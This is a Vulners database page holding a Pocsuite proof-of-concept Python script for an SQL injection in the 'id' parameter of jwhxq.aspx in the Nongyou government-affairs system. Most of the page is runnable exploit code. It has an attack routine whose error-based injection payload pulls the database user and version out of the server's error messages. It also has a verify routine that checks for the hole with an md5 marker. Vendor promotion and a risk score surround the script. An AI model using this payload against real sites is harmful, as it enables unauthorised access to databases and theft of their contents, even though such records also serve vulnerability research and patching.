Vulners
Lucene search
Farmers-government system jwhxq. aspx parameter id SQL injection vulnerability
#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import re
class TestPOC(POCBase):
vulID = '1' # ssvid
version = '1.0'
author = ['kikay']
vulDate = '2015-03-04'
createDate = '2016-06-03'
updateDate = '2016-06-03'
references = ['http://www.seebug.org/vuldb/ssvid-']
name = '农友政务系统 jwhxq.aspx 参数id SQL注入漏洞'
appPowerLink = 'http://www.nongyou.com'
appName = 'Nongyou'
appVersion = 'N/A'
vulType = 'SQL注入'
desc = '''
农友政务系统在页面jwhxq.aspx对参数id过滤不严格,导致出现SQL注入漏洞,
远程攻击者可以结合回显报错等手段,执行SQL指令。
'''
samples = ['']
def _attack(self):
#利用漏洞,获取数据库信息
result = {}
#利用floor报错方式的payload
payload=("1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,user(),0x2a2a2a"
",version(),0x247e7e7e24,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
" GROUP BY x)a) AND 'YLvB'='YLvB")
#漏洞页面
exploit='/jwhxq.aspx?id='
#构造访问地址
vulurl=self.url+exploit+payload
#伪造的HTTP头
httphead = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection':'keep-alive'
}
#提取信息的正则表达式
pars="\$~~~\$([_a-zA-Z0-9].*)\*\*\*(.*)\$~~~\$"
#尝试访问
resp=req.get(url=vulurl,headers=httphead,timeout=50)
#检查
if 'Duplicate entry' in resp.content:
#尝试提取信息
match=re.search(pars,resp.content,re.I|re.M)
if match:
#记录数据库信息
result['DatabaseInfo']={}
#数据库用户名
result['DatabaseInfo']['Username']=match.group(1)
#数据库版本
result['DatabaseInfo']['Version']=match.group(2)
return self.parse_output(result)
def _verify(self):
#利用漏洞计算md5(3.1415)
result = {}
#利用floor报错方式的payload
payload=("1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(md5(3.1415),FLOOR(RAND(0)*2))"
"x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YLvB'='YLvB")
#漏洞页面
exploit='/jwhxq.aspx?id='
#构造访问地址
vulurl=self.url+exploit+payload
#伪造的HTTP头
httphead = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection':'keep-alive'
}
#尝试访问
resp=req.get(url=vulurl,headers=httphead,timeout=50)
#检查特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
if '63e1f04640e83605c1d177544a5a0488' in resp.content:
#漏洞验证成功
result['VerifyInfo']={}
result['VerifyInfo']['URL'] = self.url+exploit
result['VerifyInfo']['Payload'] = payload
return self.parse_output(result)
def parse_output(self, result):
#parse output
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Jul 2016 00:00Current
7.1High risk
Vulners AI Score7.1